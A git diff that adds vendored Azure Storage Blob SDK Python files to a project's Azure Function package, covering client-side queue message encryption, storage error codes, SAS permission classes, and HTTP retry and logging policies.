cipher.encryptor() + padder = PKCS7(128).padder() if should_pad else None + + return encryptor, padder + + +def encrypt_queue_message(message, key_encryption_key): + ''' + Encrypts the given plain text message using AES256 in CBC mode with 128 bit padding. + Wraps the generated content-encryption-key using the user-provided key-encryption-key (kek). + Returns a json-formatted string containing the encrypted message and the encryption metadata. + + :param object message: + The plain text messge to be encrypted. + :param object key_encryption_key: + The user-provided key-encryption-key. Must implement the following methods: + wrap_key(key)--wraps the specified key using an algorithm of the user's choice. + get_key_wrap_algorithm()--returns the algorithm used to wrap the specified symmetric key. + get_kid()--returns a string key id for this key-encryption-key. + :return: A json-formatted string containing the encrypted message and the encryption metadata. + :rtype: str + ''' + + _validate_not_none('message', message) + _validate_not_none('key_encryption_key', key_encryption_key) + _validate_key_encryption_key_wrap(key_encryption_key) + + # AES256 uses 256 bit (32 byte) keys and always with 16 byte blocks + content_encryption_key = os.urandom(32) + initialization_vector = os.urandom(16) + + # Queue encoding functions all return unicode strings, and encryption should + # operate on binary strings. + message = message.encode('utf-8') + + cipher = _generate_AES_CBC_cipher(content_encryption_key, initialization_vector) + + # PKCS7 with 16 byte blocks ensures compatibility with AES. + padder = PKCS7(128).padder() + padded_data = padder.update(message) + padder.finalize() + + # Encrypt the data. + encryptor = cipher.encryptor() + encrypted_data = encryptor.update(padded_data) + encryptor.finalize() + + # Build the dictionary structure. + queue_message = {'EncryptedMessageContents': encode_base64(encrypted_data), + 'EncryptionData': _generate_encryption_data_dict(key_encryption_key, + content_encryption_key, + initialization_vector)} + + return dumps(queue_message) + + +def decrypt_queue_message(message, response, require_encryption, key_encryption_key, resolver): + ''' + Returns the decrypted message contents from an EncryptedQueueMessage. + If no encryption metadata is present, will return the unaltered message. + :param str message: + The JSON formatted QueueEncryptedMessage contents with all associated metadata. + :param bool require_encryption: + If set, will enforce that the retrieved messages are encrypted and decrypt them. + :param object key_encryption_key: + The user-provided key-encryption-key. Must implement the following methods: + unwrap_key(key, algorithm) + - returns the unwrapped form of the specified symmetric key usingthe string-specified algorithm. + get_kid() + - returns a string key id for this key-encryption-key. + :param function resolver(kid): + The user-provided key resolver. Uses the kid string to return a key-encryption-key + implementing the interface defined above. + :return: The plain text message from the queue message. + :rtype: str + ''' + + try: + message = loads(message) + + encryption_data = _dict_to_encryption_data(message['EncryptionData']) + decoded_data = decode_base64_to_bytes(message['EncryptedMessageContents']) + except (KeyError, ValueError): + # Message was not json formatted and so was not encrypted + # or the user provided a json formatted message. + if require_encryption: + raise ValueError('Message was not encrypted.') + + return message + try: + return _decrypt_message(decoded_data, encryption_data, key_encryption_key, resolver).decode('utf-8') + except Exception as error: + raise HttpResponseError( + message="Decryption failed.", + response=response, + error=error) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/models.py new file mode 100644 index 0000000..ce75846 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/models.py @@ -0,0 +1,482 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=too-many-instance-attributes +from enum import Enum + +from azure.core import CaseInsensitiveEnumMeta + + +def get_enum_value(value): + if value is None or value in ["None", ""]: + return None + try: + return value.value + except AttributeError: + return value + + +class StorageErrorCode(str, Enum, metaclass=CaseInsensitiveEnumMeta): + + # Generic storage values + ACCOUNT_ALREADY_EXISTS = "AccountAlreadyExists" + ACCOUNT_BEING_CREATED = "AccountBeingCreated" + ACCOUNT_IS_DISABLED = "AccountIsDisabled" + AUTHENTICATION_FAILED = "AuthenticationFailed" + AUTHORIZATION_FAILURE = "AuthorizationFailure" + NO_AUTHENTICATION_INFORMATION = "NoAuthenticationInformation" + CONDITION_HEADERS_NOT_SUPPORTED = "ConditionHeadersNotSupported" + CONDITION_NOT_MET = "ConditionNotMet" + EMPTY_METADATA_KEY = "EmptyMetadataKey" + INSUFFICIENT_ACCOUNT_PERMISSIONS = "InsufficientAccountPermissions" + INTERNAL_ERROR = "InternalError" + INVALID_AUTHENTICATION_INFO = "InvalidAuthenticationInfo" + INVALID_HEADER_VALUE = "InvalidHeaderValue" + INVALID_HTTP_VERB = "InvalidHttpVerb" + INVALID_INPUT = "InvalidInput" + INVALID_MD5 = "InvalidMd5" + INVALID_METADATA = "InvalidMetadata" + INVALID_QUERY_PARAMETER_VALUE = "InvalidQueryParameterValue" + INVALID_RANGE = "InvalidRange" + INVALID_RESOURCE_NAME = "InvalidResourceName" + INVALID_URI = "InvalidUri" + INVALID_XML_DOCUMENT = "InvalidXmlDocument" + INVALID_XML_NODE_VALUE = "InvalidXmlNodeValue" + MD5_MISMATCH = "Md5Mismatch" + METADATA_TOO_LARGE = "MetadataTooLarge" + MISSING_CONTENT_LENGTH_HEADER = "MissingContentLengthHeader" + MISSING_REQUIRED_QUERY_PARAMETER = "MissingRequiredQueryParameter" + MISSING_REQUIRED_HEADER = "MissingRequiredHeader" + MISSING_REQUIRED_XML_NODE = "MissingRequiredXmlNode" + MULTIPLE_CONDITION_HEADERS_NOT_SUPPORTED = "MultipleConditionHeadersNotSupported" + OPERATION_TIMED_OUT = "OperationTimedOut" + OUT_OF_RANGE_INPUT = "OutOfRangeInput" + OUT_OF_RANGE_QUERY_PARAMETER_VALUE = "OutOfRangeQueryParameterValue" + REQUEST_BODY_TOO_LARGE = "RequestBodyTooLarge" + RESOURCE_TYPE_MISMATCH = "ResourceTypeMismatch" + REQUEST_URL_FAILED_TO_PARSE = "RequestUrlFailedToParse" + RESOURCE_ALREADY_EXISTS = "ResourceAlreadyExists" + RESOURCE_NOT_FOUND = "ResourceNotFound" + SERVER_BUSY = "ServerBusy" + UNSUPPORTED_HEADER = "UnsupportedHeader" + UNSUPPORTED_XML_NODE = "UnsupportedXmlNode" + UNSUPPORTED_QUERY_PARAMETER = "UnsupportedQueryParameter" + UNSUPPORTED_HTTP_VERB = "UnsupportedHttpVerb" + + # Blob values + APPEND_POSITION_CONDITION_NOT_MET = "AppendPositionConditionNotMet" + BLOB_ALREADY_EXISTS = "BlobAlreadyExists" + BLOB_NOT_FOUND = "BlobNotFound" + BLOB_OVERWRITTEN = "BlobOverwritten" + BLOB_TIER_INADEQUATE_FOR_CONTENT_LENGTH = "BlobTierInadequateForContentLength" + BLOCK_COUNT_EXCEEDS_LIMIT = "BlockCountExceedsLimit" + BLOCK_LIST_TOO_LONG = "BlockListTooLong" + CANNOT_CHANGE_TO_LOWER_TIER = "CannotChangeToLowerTier" + CANNOT_VERIFY_COPY_SOURCE = "CannotVerifyCopySource" + CONTAINER_ALREADY_EXISTS = "ContainerAlreadyExists" + CONTAINER_BEING_DELETED = "ContainerBeingDeleted" + CONTAINER_DISABLED = "ContainerDisabled" + CONTAINER_NOT_FOUND = "ContainerNotFound" + CONTENT_LENGTH_LARGER_THAN_TIER_LIMIT = "ContentLengthLargerThanTierLimit" + COPY_ACROSS_ACCOUNTS_NOT_SUPPORTED = "CopyAcrossAccountsNotSupported" + COPY_ID_MISMATCH = "CopyIdMismatch" + FEATURE_VERSION_MISMATCH = "FeatureVersionMismatch" + INCREMENTAL_COPY_BLOB_MISMATCH = "IncrementalCopyBlobMismatch" + INCREMENTAL_COPY_OF_ERALIER_VERSION_SNAPSHOT_NOT_ALLOWED = "IncrementalCopyOfEralierVersionSnapshotNotAllowed" + INCREMENTAL_COPY_SOURCE_MUST_BE_SNAPSHOT = "IncrementalCopySourceMustBeSnapshot" + INFINITE_LEASE_DURATION_REQUIRED = "InfiniteLeaseDurationRequired" + INVALID_BLOB_OR_BLOCK = "InvalidBlobOrBlock" + INVALID_BLOB_TIER = "InvalidBlobTier" + INVALID_BLOB_TYPE = "InvalidBlobType" + INVALID_BLOCK_ID = "InvalidBlockId" + INVALID_BLOCK_LIST = "InvalidBlockList" + INVALID_OPERATION = "InvalidOperation" + INVALID_PAGE_RANGE = "InvalidPageRange" + INVALID_SOURCE_BLOB_TYPE = "InvalidSourceBlobType" + INVALID_SOURCE_BLOB_URL = "InvalidSourceBlobUrl" + INVALID_VERSION_FOR_PAGE_BLOB_OPERATION = "InvalidVersionForPageBlobOperation" + LEASE_ALREADY_PRESENT = "LeaseAlreadyPresent" + LEASE_ALREADY_BROKEN = "LeaseAlreadyBroken" + LEASE_ID_MISMATCH_WITH_BLOB_OPERATION = "LeaseIdMismatchWithBlobOperation" + LEASE_ID_MISMATCH_WITH_CONTAINER_OPERATION = "LeaseIdMismatchWithContainerOperation" + LEASE_ID_MISMATCH_WITH_LEASE_OPERATION = "LeaseIdMismatchWithLeaseOperation" + LEASE_ID_MISSING = "LeaseIdMissing" + LEASE_IS_BREAKING_AND_CANNOT_BE_ACQUIRED = "LeaseIsBreakingAndCannotBeAcquired" + LEASE_IS_BREAKING_AND_CANNOT_BE_CHANGED = "LeaseIsBreakingAndCannotBeChanged" + LEASE_IS_BROKEN_AND_CANNOT_BE_RENEWED = "LeaseIsBrokenAndCannotBeRenewed" + LEASE_LOST = "LeaseLost" + LEASE_NOT_PRESENT_WITH_BLOB_OPERATION = "LeaseNotPresentWithBlobOperation" + LEASE_NOT_PRESENT_WITH_CONTAINER_OPERATION = "LeaseNotPresentWithContainerOperation" + LEASE_NOT_PRESENT_WITH_LEASE_OPERATION = "LeaseNotPresentWithLeaseOperation" + MAX_BLOB_SIZE_CONDITION_NOT_MET = "MaxBlobSizeConditionNotMet" + NO_PENDING_COPY_OPERATION = "NoPendingCopyOperation" + OPERATION_NOT_ALLOWED_ON_INCREMENTAL_COPY_BLOB = "OperationNotAllowedOnIncrementalCopyBlob" + PENDING_COPY_OPERATION = "PendingCopyOperation" + PREVIOUS_SNAPSHOT_CANNOT_BE_NEWER = "PreviousSnapshotCannotBeNewer" + PREVIOUS_SNAPSHOT_NOT_FOUND = "PreviousSnapshotNotFound" + PREVIOUS_SNAPSHOT_OPERATION_NOT_SUPPORTED = "PreviousSnapshotOperationNotSupported" + SEQUENCE_NUMBER_CONDITION_NOT_MET = "SequenceNumberConditionNotMet" + SEQUENCE_NUMBER_INCREMENT_TOO_LARGE = "SequenceNumberIncrementTooLarge" + SNAPSHOT_COUNT_EXCEEDED = "SnapshotCountExceeded" + SNAPHOT_OPERATION_RATE_EXCEEDED = "SnaphotOperationRateExceeded" + SNAPSHOTS_PRESENT = "SnapshotsPresent" + SOURCE_CONDITION_NOT_MET = "SourceConditionNotMet" + SYSTEM_IN_USE = "SystemInUse" + TARGET_CONDITION_NOT_MET = "TargetConditionNotMet" + UNAUTHORIZED_BLOB_OVERWRITE = "UnauthorizedBlobOverwrite" + BLOB_BEING_REHYDRATED = "BlobBeingRehydrated" + BLOB_ARCHIVED = "BlobArchived" + BLOB_NOT_ARCHIVED = "BlobNotArchived" + + # Queue values + INVALID_MARKER = "InvalidMarker" + MESSAGE_NOT_FOUND = "MessageNotFound" + MESSAGE_TOO_LARGE = "MessageTooLarge" + POP_RECEIPT_MISMATCH = "PopReceiptMismatch" + QUEUE_ALREADY_EXISTS = "QueueAlreadyExists" + QUEUE_BEING_DELETED = "QueueBeingDeleted" + QUEUE_DISABLED = "QueueDisabled" + QUEUE_NOT_EMPTY = "QueueNotEmpty" + QUEUE_NOT_FOUND = "QueueNotFound" + + # File values + CANNOT_DELETE_FILE_OR_DIRECTORY = "CannotDeleteFileOrDirectory" + CLIENT_CACHE_FLUSH_DELAY = "ClientCacheFlushDelay" + DELETE_PENDING = "DeletePending" + DIRECTORY_NOT_EMPTY = "DirectoryNotEmpty" + FILE_LOCK_CONFLICT = "FileLockConflict" + INVALID_FILE_OR_DIRECTORY_PATH_NAME = "InvalidFileOrDirectoryPathName" + PARENT_NOT_FOUND = "ParentNotFound" + READ_ONLY_ATTRIBUTE = "ReadOnlyAttribute" + SHARE_ALREADY_EXISTS = "ShareAlreadyExists" + SHARE_BEING_DELETED = "ShareBeingDeleted" + SHARE_DISABLED = "ShareDisabled" + SHARE_NOT_FOUND = "ShareNotFound" + SHARING_VIOLATION = "SharingViolation" + SHARE_SNAPSHOT_IN_PROGRESS = "ShareSnapshotInProgress" + SHARE_SNAPSHOT_COUNT_EXCEEDED = "ShareSnapshotCountExceeded" + SHARE_SNAPSHOT_OPERATION_NOT_SUPPORTED = "ShareSnapshotOperationNotSupported" + SHARE_HAS_SNAPSHOTS = "ShareHasSnapshots" + CONTAINER_QUOTA_DOWNGRADE_NOT_ALLOWED = "ContainerQuotaDowngradeNotAllowed" + + # DataLake values + CONTENT_LENGTH_MUST_BE_ZERO = 'ContentLengthMustBeZero' + PATH_ALREADY_EXISTS = 'PathAlreadyExists' + INVALID_FLUSH_POSITION = 'InvalidFlushPosition' + INVALID_PROPERTY_NAME = 'InvalidPropertyName' + INVALID_SOURCE_URI = 'InvalidSourceUri' + UNSUPPORTED_REST_VERSION = 'UnsupportedRestVersion' + FILE_SYSTEM_NOT_FOUND = 'FilesystemNotFound' + PATH_NOT_FOUND = 'PathNotFound' + RENAME_DESTINATION_PARENT_PATH_NOT_FOUND = 'RenameDestinationParentPathNotFound' + SOURCE_PATH_NOT_FOUND = 'SourcePathNotFound' + DESTINATION_PATH_IS_BEING_DELETED = 'DestinationPathIsBeingDeleted' + FILE_SYSTEM_ALREADY_EXISTS = 'FilesystemAlreadyExists' + FILE_SYSTEM_BEING_DELETED = 'FilesystemBeingDeleted' + INVALID_DESTINATION_PATH = 'InvalidDestinationPath' + INVALID_RENAME_SOURCE_PATH = 'InvalidRenameSourcePath' + INVALID_SOURCE_OR_DESTINATION_RESOURCE_TYPE = 'InvalidSourceOrDestinationResourceType' + LEASE_IS_ALREADY_BROKEN = 'LeaseIsAlreadyBroken' + LEASE_NAME_MISMATCH = 'LeaseNameMismatch' + PATH_CONFLICT = 'PathConflict' + SOURCE_PATH_IS_BEING_DELETED = 'SourcePathIsBeingDeleted' + + +class DictMixin(object): + + def __setitem__(self, key, item): + self.__dict__[key] = item + + def __getitem__(self, key): + return self.__dict__[key] + + def __repr__(self): + return str(self) + + def __len__(self): + return len(self.keys()) + + def __delitem__(self, key): + self.__dict__[key] = None + + def __eq__(self, other): + """Compare objects by comparing all attributes.""" + if isinstance(other, self.__class__): + return self.__dict__ == other.__dict__ + return False + + def __ne__(self, other): + """Compare objects by comparing all attributes.""" + return not self.__eq__(other) + + def __str__(self): + return str({k: v for k, v in self.__dict__.items() if not k.startswith('_')}) + + def has_key(self, k): + return k in self.__dict__ + + def update(self, *args, **kwargs): + return self.__dict__.update(*args, **kwargs) + + def keys(self): + return [k for k in self.__dict__ if not k.startswith('_')] + + def values(self): + return [v for k, v in self.__dict__.items() if not k.startswith('_')] + + def items(self): + return [(k, v) for k, v in self.__dict__.items() if not k.startswith('_')] + + def get(self, key, default=None): + if key in self.__dict__: + return self.__dict__[key] + return default + + +class LocationMode(object): + """ + Specifies the location the request should be sent to. This mode only applies + for RA-GRS accounts which allow secondary read access. All other account types + must use PRIMARY. + """ + + PRIMARY = 'primary' #: Requests should be sent to the primary location. + SECONDARY = 'secondary' #: Requests should be sent to the secondary location, if possible. + + +class ResourceTypes(object): + """ + Specifies the resource types that are accessible with the account SAS. + + :param bool service: + Access to service-level APIs (e.g., Get/Set Service Properties, + Get Service Stats, List Containers/Queues/Shares) + :param bool container: + Access to container-level APIs (e.g., Create/Delete Container, + Create/Delete Queue, Create/Delete Share, + List Blobs/Files and Directories) + :param bool object: + Access to object-level APIs for blobs, queue messages, and + files(e.g. Put Blob, Query Entity, Get Messages, Create File, etc.) + """ + + def __init__(self, service=False, container=False, object=False): # pylint: disable=redefined-builtin + self.service = service + self.container = container + self.object = object + self._str = (('s' if self.service else '') + + ('c' if self.container else '') + + ('o' if self.object else '')) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, string): + """Create a ResourceTypes from a string. + + To specify service, container, or object you need only to + include the first letter of the word in the string. E.g. service and container, + you would provide a string "sc". + + :param str string: Specify service, container, or object in + in the string with the first letter of the word. + :return: A ResourceTypes object + :rtype: ~azure.storage.blob.ResourceTypes + """ + res_service = 's' in string + res_container = 'c' in string + res_object = 'o' in string + + parsed = cls(res_service, res_container, res_object) + parsed._str = string # pylint: disable = protected-access + return parsed + + +class AccountSasPermissions(object): + """ + :class:`~ResourceTypes` class to be used with generate_account_sas + function and for the AccessPolicies used with set_*_acl. There are two types of + SAS which may be used to grant resource access. One is to grant access to a + specific resource (resource-specific). Another is to grant access to the + entire service for a specific account and allow certain operations based on + perms found here. + + :param bool read: + Valid for all signed resources types (Service, Container, and Object). + Permits read permissions to the specified resource type. + :param bool write: + Valid for all signed resources types (Service, Container, and Object). + Permits write permissions to the specified resource type. + :param bool delete: + Valid for Container and Object resource types, except for queue messages. + :param bool delete_previous_version: + Delete the previous blob version for the versioning enabled storage account. + :param bool list: + Valid for Service and Container resource types only. + :param bool add: + Valid for the following Object resource types only: queue messages, and append blobs. + :param bool create: + Valid for the following Object resource types only: blobs and files. + Users can create new blobs or files, but may not overwrite existing + blobs or files. + :param bool update: + Valid for the following Object resource types only: queue messages. + :param bool process: + Valid for the following Object resource type only: queue messages. + :keyword bool tag: + To enable set or get tags on the blobs in the container. + :keyword bool filter_by_tags: + To enable get blobs by tags, this should be used together with list permission. + :keyword bool set_immutability_policy: + To enable operations related to set/delete immutability policy. + To get immutability policy, you just need read permission. + :keyword bool permanent_delete: + To enable permanent delete on the blob is permitted. + Valid for Object resource type of Blob only. + """ + def __init__(self, read=False, write=False, delete=False, + list=False, # pylint: disable=redefined-builtin + add=False, create=False, update=False, process=False, delete_previous_version=False, **kwargs): + self.read = read + self.write = write + self.delete = delete + self.delete_previous_version = delete_previous_version + self.permanent_delete = kwargs.pop('permanent_delete', False) + self.list = list + self.add = add + self.create = create + self.update = update + self.process = process + self.tag = kwargs.pop('tag', False) + self.filter_by_tags = kwargs.pop('filter_by_tags', False) + self.set_immutability_policy = kwargs.pop('set_immutability_policy', False) + self._str = (('r' if self.read else '') + + ('w' if self.write else '') + + ('d' if self.delete else '') + + ('x' if self.delete_previous_version else '') + + ('y' if self.permanent_delete else '') + + ('l' if self.list else '') + + ('a' if self.add else '') + + ('c' if self.create else '') + + ('u' if self.update else '') + + ('p' if self.process else '') + + ('f' if self.filter_by_tags else '') + + ('t' if self.tag else '') + + ('i' if self.set_immutability_policy else '') + ) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, permission): + """Create AccountSasPermissions from a string. + + To specify read, write, delete, etc. permissions you need only to + include the first letter of the word in the string. E.g. for read and write + permissions you would provide a string "rw". + + :param str permission: Specify permissions in + the string with the first letter of the word. + :return: An AccountSasPermissions object + :rtype: ~azure.storage.blob.AccountSasPermissions + """ + p_read = 'r' in permission + p_write = 'w' in permission + p_delete = 'd' in permission + p_delete_previous_version = 'x' in permission + p_permanent_delete = 'y' in permission + p_list = 'l' in permission + p_add = 'a' in permission + p_create = 'c' in permission + p_update = 'u' in permission + p_process = 'p' in permission + p_tag = 't' in permission + p_filter_by_tags = 'f' in permission + p_set_immutability_policy = 'i' in permission + parsed = cls(read=p_read, write=p_write, delete=p_delete, delete_previous_version=p_delete_previous_version, + list=p_list, add=p_add, create=p_create, update=p_update, process=p_process, tag=p_tag, + filter_by_tags=p_filter_by_tags, set_immutability_policy=p_set_immutability_policy, + permanent_delete=p_permanent_delete) + + return parsed + + +class Services(object): + """Specifies the services accessible with the account SAS. + + :param bool blob: + Access for the `~azure.storage.blob.BlobServiceClient` + :param bool queue: + Access for the `~azure.storage.queue.QueueServiceClient` + :param bool fileshare: + Access for the `~azure.storage.fileshare.ShareServiceClient` + """ + + def __init__(self, blob=False, queue=False, fileshare=False): + self.blob = blob + self.queue = queue + self.fileshare = fileshare + self._str = (('b' if self.blob else '') + + ('q' if self.queue else '') + + ('f' if self.fileshare else '')) + + def __str__(self): + return self._str + + @classmethod + def from_string(cls, string): + """Create Services from a string. + + To specify blob, queue, or file you need only to + include the first letter of the word in the string. E.g. for blob and queue + you would provide a string "bq". + + :param str string: Specify blob, queue, or file in + in the string with the first letter of the word. + :return: A Services object + :rtype: ~azure.storage.blob.Services + """ + res_blob = 'b' in string + res_queue = 'q' in string + res_file = 'f' in string + + parsed = cls(res_blob, res_queue, res_file) + parsed._str = string # pylint: disable = protected-access + return parsed + + +class UserDelegationKey(object): + """ + Represents a user delegation key, provided to the user by Azure Storage + based on their Azure Active Directory access token. + + The fields are saved as simple strings since the user does not have to interact with this object; + to generate an identify SAS, the user can simply pass it to the right API. + + :ivar str signed_oid: + Object ID of this token. + :ivar str signed_tid: + Tenant ID of the tenant that issued this token. + :ivar str signed_start: + The datetime this token becomes valid. + :ivar str signed_expiry: + The datetime this token expires. + :ivar str signed_service: + What service this key is valid for. + :ivar str signed_version: + The version identifier of the REST service that created this token. + :ivar str value: + The user delegation key. + """ + def __init__(self): + self.signed_oid = None + self.signed_tid = None + self.signed_start = None + self.signed_expiry = None + self.signed_service = None + self.signed_version = None + self.value = None diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/parser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/parser.py new file mode 100644 index 0000000..07ac93e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/parser.py @@ -0,0 +1,20 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import sys + +if sys.version_info < (3,): + def _str(value): + if isinstance(value, unicode): # pylint: disable=undefined-variable + return value.encode('utf-8') + + return str(value) +else: + _str = str + + +def _to_utc_datetime(value): + return value.strftime('%Y-%m-%dT%H:%M:%SZ') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies.py new file mode 100644 index 0000000..7f54e80 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/policies.py @@ -0,0 +1,657 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import base64 +import hashlib +import re +import random +from time import time +from io import SEEK_SET, UnsupportedOperation +import logging +import uuid +from typing import Any, TYPE_CHECKING +from wsgiref.handlers import format_date_time +try: + from urllib.parse import ( + urlparse, + parse_qsl, + urlunparse, + urlencode, + ) +except ImportError: + from urllib import urlencode # type: ignore + from urlparse import ( # type: ignore + urlparse, + parse_qsl, + urlunparse, + ) + +from azure.core.pipeline.policies import ( + BearerTokenCredentialPolicy, + HeadersPolicy, + HTTPPolicy, + NetworkTraceLoggingPolicy, + RequestHistory, + SansIOHTTPPolicy, +) +from azure.core.exceptions import AzureError, ServiceRequestError, ServiceResponseError + +from .authentication import StorageHttpChallenge +from .constants import DEFAULT_OAUTH_SCOPE, STORAGE_OAUTH_SCOPE +from .models import LocationMode + +try: + _unicode_type = unicode # type: ignore +except NameError: + _unicode_type = str + +if TYPE_CHECKING: + from azure.core.credentials import TokenCredential + from azure.core.pipeline import PipelineRequest, PipelineResponse + + +_LOGGER = logging.getLogger(__name__) + + +def encode_base64(data): + if isinstance(data, _unicode_type): + data = data.encode('utf-8') + encoded = base64.b64encode(data) + return encoded.decode('utf-8') + + +def is_exhausted(settings): + """Are we out of retries?""" + retry_counts = (settings['total'], settings['connect'], settings['read'], settings['status']) + retry_counts = list(filter(None, retry_counts)) + if not retry_counts: + return False + return min(retry_counts) < 0 + + +def retry_hook(settings, **kwargs): + if settings['hook']: + settings['hook'](retry_count=settings['count'] - 1, location_mode=settings['mode'], **kwargs) + + +def is_retry(response, mode): # pylint: disable=too-many-return-statements + """Is this method/status code retryable? (Based on allowlists and control + variables such as the number of total retries to allow, whether to + respect the Retry-After header, whether this header is present, and + whether the returned status code is on the list of status codes to + be retried upon on the presence of the aforementioned header) + """ + status = response.http_response.status_code + if 300 <= status < 500: + # An exception occured, but in most cases it was expected. Examples could + # include a 309 Conflict or 412 Precondition Failed. + if status == 404 and mode == LocationMode.SECONDARY: + # Response code 404 should be retried if secondary was used. + return True + if status == 408: + # Response code 408 is a timeout and should be retried. + return True + return False + if status >= 500: + # Response codes above 500 with the exception of 501 Not Implemented and + # 505 Version Not Supported indicate a server issue and should be retried. + if status in [501, 505]: + return False + return True + # retry if invalid content md5 + if response.context.get('validate_content', False) and response.http_response.headers.get('content-md5'): + computed_md5 = response.http_request.headers.get('content-md5', None) or \ + encode_base64(StorageContentValidation.get_content_md5(response.http_response.body())) + if response.http_response.headers['content-md5'] != computed_md5: + return True + return False + + +def urljoin(base_url, stub_url): + parsed = urlparse(base_url) + parsed = parsed._replace(path=parsed.path + '/' + stub_url) + return parsed.geturl() + + +class QueueMessagePolicy(SansIOHTTPPolicy): + + def on_request(self, request): + message_id = request.context.options.pop('queue_message_id', None) + if message_id: + request.http_request.url = urljoin( + request.http_request.url, + message_id) + + +class StorageHeadersPolicy(HeadersPolicy): + request_id_header_name = 'x-ms-client-request-id' + + def on_request(self, request): + # type: (PipelineRequest, Any) -> None + super(StorageHeadersPolicy, self).on_request(request) + current_time = format_date_time(time()) + request.http_request.headers['x-ms-date'] = current_time + + custom_id = request.context.options.pop('client_request_id', None) + request.http_request.headers['x-ms-client-request-id'] = custom_id or str(uuid.uuid1()) + + # def on_response(self, request, response): + # # raise exception if the echoed client request id from the service is not identical to the one we sent + # if self.request_id_header_name in response.http_response.headers: + + # client_request_id = request.http_request.headers.get(self.request_id_header_name) + + # if response.http_response.headers[self.request_id_header_name] != client_request_id: + # raise AzureError( + # "Echoed client request ID: {} does not match sent client request ID: {}. " + # "Service request ID: {}".format( + # response.http_response.headers[self.request_id_header_name], client_request_id, + # response.http_response.headers['x-ms-request-id']), + # response=response.http_response + # ) + + +class StorageHosts(SansIOHTTPPolicy): + + def __init__(self, hosts=None, **kwargs): # pylint: disable=unused-argument + self.hosts = hosts + super(StorageHosts, self).__init__() + + def on_request(self, request): + # type: (PipelineRequest, Any) -> None + request.context.options['hosts'] = self.hosts + parsed_url = urlparse(request.http_request.url) + + # Detect what location mode we're currently requesting with + location_mode = LocationMode.PRIMARY + for key, value in self.hosts.items(): + if parsed_url.netloc == value: + location_mode = key + + # See if a specific location mode has been specified, and if so, redirect + use_location = request.context.options.pop('use_location', None) + if use_location: + # Lock retries to the specific location + request.context.options['retry_to_secondary'] = False + if use_location not in self.hosts: + raise ValueError("Attempting to use undefined host location {}".format(use_location)) + if use_location != location_mode: + # Update request URL to use the specified location + updated = parsed_url._replace(netloc=self.hosts[use_location]) + request.http_request.url = updated.geturl() + location_mode = use_location + + request.context.options['location_mode'] = location_mode + + +class StorageLoggingPolicy(NetworkTraceLoggingPolicy): + """A policy that logs HTTP request and response to the DEBUG logger. + + This accepts both global configuration, and per-request level with "enable_http_logger" + """ + def __init__(self, logging_enable=False, **kwargs): + self.logging_body = kwargs.pop("logging_body", False) + super(StorageLoggingPolicy, self).__init__(logging_enable=logging_enable, **kwargs) + + def on_request(self, request): + # type: (PipelineRequest, Any) -> None + http_request = request.http_request + options = request.context.options + self.logging_body = self.logging_body or options.pop("logging_body", False) + if options.pop("logging_enable", self.enable_http_logger): + request.context["logging_enable"] = True + if not _LOGGER.isEnabledFor(logging.DEBUG): + return + + try: + log_url = http_request.url + query_params = http_request.query + if 'sig' in query_params: + log_url = log_url.replace(query_params['sig'], "sig=*****") + _LOGGER.debug("Request URL: %r", log_url) + _LOGGER.debug("Request method: %r", http_request.method) + _LOGGER.debug("Request headers:") + for header, value in http_request.headers.items(): + if header.lower() == 'authorization': + value = '*****' + elif header.lower() == 'x-ms-copy-source' and 'sig' in value: + # take the url apart and scrub away the signed signature + scheme, netloc, path, params, query, fragment = urlparse(value) + parsed_qs = dict(parse_qsl(query)) + parsed_qs['sig'] = '*****' + + # the SAS needs to be put back together + value = urlunparse((scheme, netloc, path, params, urlencode(parsed_qs), fragment)) + + _LOGGER.debug(" %r: %r", header, value) + _LOGGER.debug("Request body:") + + if self.logging_body: + _LOGGER.debug(str(http_request.body)) + else: + # We don't want to log the binary data of a file upload. + _LOGGER.debug("Hidden body, please use logging_body to show body") + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log request: %r", err) + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse, Any) -> None + if response.context.pop("logging_enable", self.enable_http_logger): + if not _LOGGER.isEnabledFor(logging.DEBUG): + return + + try: + _LOGGER.debug("Response status: %r", response.http_response.status_code) + _LOGGER.debug("Response headers:") + for res_header, value in response.http_response.headers.items(): + _LOGGER.debug(" %r: %r", res_header, value) + + # We don't want to log binary data if the response is a file. + _LOGGER.debug("Response content:") + pattern = re.compile(r'attachment; ?filename=["\w.]+', re.IGNORECASE) + header = response.http_response.headers.get('content-disposition') + resp_content_type = response.http_response.headers.get("content-type", "") + + if header and pattern.match(header): + filename = header.partition('=')[2] + _LOGGER.debug("File attachments: %s", filename) + elif resp_content_type.endswith("octet-stream"): + _LOGGER.debug("Body contains binary data.") + elif resp_content_type.startswith("image"): + _LOGGER.debug("Body contains image data.") + + if self.logging_body and resp_content_type.startswith("text"): + _LOGGER.debug(response.http_response.text()) + elif self.logging_body: + try: + _LOGGER.debug(response.http_response.body()) + except ValueError: + _LOGGER.debug("Body is streamable") + + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log response: %s", repr(err)) + + 